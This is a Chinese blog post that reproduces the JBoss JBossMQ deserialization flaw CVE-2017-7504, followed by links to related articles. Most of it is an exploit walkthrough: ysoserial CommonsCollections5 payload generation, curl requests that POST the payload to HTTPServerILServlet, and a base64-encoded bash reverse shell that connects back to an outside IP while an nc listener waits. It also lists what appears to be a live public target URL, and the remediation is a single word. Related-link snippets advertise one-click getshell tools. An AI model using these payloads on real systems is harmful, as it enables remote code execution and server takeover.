jboss 反序列化 (CVE-2017-7504)复现

最新推荐文章于 2025-03-17 12:13:41 发布
最新推荐文章于 2025-03-17 12:13:41 发布
阅读量2.7k 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121144956
版权

jboss 反序列化 (CVE-2017-7504)


所有文章,仅供安全研究与学习之用,后果自负!

jboss 反序列化 (CVE-2017-7504)

0x01 漏洞描述

Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Red Hat Jboss AS 4.X及之前的版本中的JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在安全漏洞。远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

0x02 影响范围

0x03 漏洞复现

存在漏洞页面

/jbossmq-httpil/HTTPServerILServlet

http://118.193.36.37:42310/jbossmq-httpil/HTTPServerILServlet

存在如下页面

在这里插入图片描述

(1)尝试 创建 /tmp/123 文件夹

java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/123" > 1.ser
# 利用jar包生成一个创建success文件的payload文件1.ser
curl http://192.168.216.189:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# 利用curl工具向jbossmq-httpil/HTTPServerILServlet 发送一个1.ser的请求

在这里插入图片描述

进入docker 环境查看是否创建成功
	docker ps 
	docker exec -it id bash
	ls .tmp

发现创建123成功
在这里插入图片描述
(2) 反弹shell
1.开启监听

nc -lvvp port

2.执行命令

java -jar ysoserial-master-30099844c6-1.jar  CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}" > 1.ser
#利用jar包生成一个执行反弹shell的payload文件1.ser   bash命令 base64编码
curl http://192.168.216.189:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser
# 利用curl工具向jbossmq-httpil/HTTPServerILServlet 发送一个1.ser的请求

在这里插入图片描述

反弹shell成功

在这里插入图片描述

0x04 漏洞修复

升级版本

网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
weixin_54626591的博客
05-06 363
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
浅析源码:CVE-2017-7504_JBoss反序列化
m0_74051295的博客
12-13 390
CVE-2017-7504_JBoss反序列化攻击者能够通过特定的接口发送恶意构造的序列化对象,而这些对象在反序列化时可以触发任意的代码执行。漏洞点主要是在 JBoss 的​ 服务中,该服务允许通过 HTTP 协议发送 Java 序列化数据进行远程方法调用(RMI)。攻击者可以利用该功能发送恶意 Java 对象,从而在服务器上执行任意命令。
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具,方便我们进行漏洞利用getshell。
CVE重要漏洞复现JBOSS漏洞合集
最新发布
没有网络安全就没有国家安全
03-17 996
CVE重要漏洞复现JBOSS漏洞合集
JBOSS 反序列化CVE-2015-7501)复现
weixin_63124284的博客
10-24 1550
JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码。
JBOSS反序列化漏洞工具
03-28
通过JBOSS4 commons-collections.jar包的反序列化类InvokerTransformer, InstantiateFactory 和 InstantiateTransfromer class 文件可以远程操控服务器
中间件安全JBoss 反序列化命令执行漏洞.(CVE-2017-12149)
网络安全领域___专研者.
11-28 883
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
JBoss反序列化漏洞复现 CVE-2017-7504
m0_62284238的博客
09-11 463
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。进入vulnhub目录下的jboss目录,进入CVE-2017-7504目录。访问靶机的8080端口。出现如下即为开启成功!
反序列化JBOSS反序列化
zh的博客
10-15 465
靶场地址:http://whalwl.site:8037/ 解题准备:反序列化基本原理 解题思路: 1、访问首页,发现有管理员后台链接,点击后获得JBOSS版本 JBoss AS 6 Admin Console 2、网上搜索相关漏洞 访问这个地址报500,说明漏洞存在 3、下载漏洞利用工具,填写刚才的漏洞地址,检测存在漏洞,执行相关系统命令获取flag 4、工具直接执行命令 ...
JBoss反序列化
Massimo__JAVA的博客
07-15 602
jBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可, 可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、 EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
漏洞复现Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504
weixin_45556536的博客
11-12 929
Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504基础知识漏洞原理影响版本复现思路复现CVE-2017-121491、特征检测2、反弹shell复现CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObj
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JAVA反序列化jboss 进入后台(及送JAVA反序列化工具和中国cai dao)
12-10
JAVA反序列化教程,利用JAVA反序列化软件进行检测,寻找,已经涉及到部分CMD命令和寻找网页IP,以及远程登陆简单介绍
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Jboss多个远程命令执行漏洞CVE-2017-12149、CVE-2015-7501、CVE-2017-7504
qq_68163788的博客
06-26 1567
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JbossCVE-2017-12149)反序列化命令执行漏洞
weixin_51151498的博客
12-11 2428
JbossCVE-2017-12149)反序列化命令执行漏洞
[Vulfocus解题系列] jboss 反序列化CVE-2017-7504
00勇士王子的博客
07-11 1256
漏洞介绍 名称: jboss 反序列化CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
jboss CVE-2017-7504 如何修复
11-03
JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。修复该漏洞的方法如下: 1.升级JBoss AS至5.x或以上版本。 2.禁用JMS over HTTP Invocation Layer。 3.限制HTTPServerILServlet的访问权限。 4.使用安全的序列化方式。 5.使用防火墙等安全设备限制对HTTPServerILServlet的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值